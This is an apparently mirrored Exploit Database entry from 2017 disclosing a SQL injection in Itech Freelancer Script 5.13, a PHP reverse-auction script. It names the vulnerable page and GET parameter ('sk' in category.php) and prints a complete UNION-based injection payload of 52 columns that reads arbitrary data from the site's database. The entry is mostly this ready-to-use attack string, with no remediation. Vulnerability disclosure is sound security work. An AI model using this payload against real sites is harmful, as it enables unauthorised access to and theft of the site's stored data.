Itech Freelancer Script 5.13 – SQL Injection

• Exploit Database
• 36 阅读

• 作者： Kaan KAMIS
  日期： 2017-01-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41191/

• Exploit Title: Itech Freelancer Script v5.13 – SQL Injection
  Date: 30.01.2017
  Vendor Homepage: http://itechscripts.com/
  Software Link: http://itechscripts.com/freelancer-script/
  Exploit Author: Kaan KAMIS
  Contact: iletisim[at]k2an[dot]com
  Website: http://k2an.com
  Category: Web Application Exploits
  
  Overview
  
  Itech Freelancer Script v5.13 is the best reverse auction script available online. Just install the product to launch your website within minutes. Please try the product now.
  
  Type of vulnerability:
  
  An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read
  arbitrary data from the database.
  
  Vulnerability:
  
  URL : http://localhost/category.php?sk=4[payload]
  
  Parameter: sk (GET)
  Type: UNION query
  Title: Generic UNION query (NULL) - 52 columns
  Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL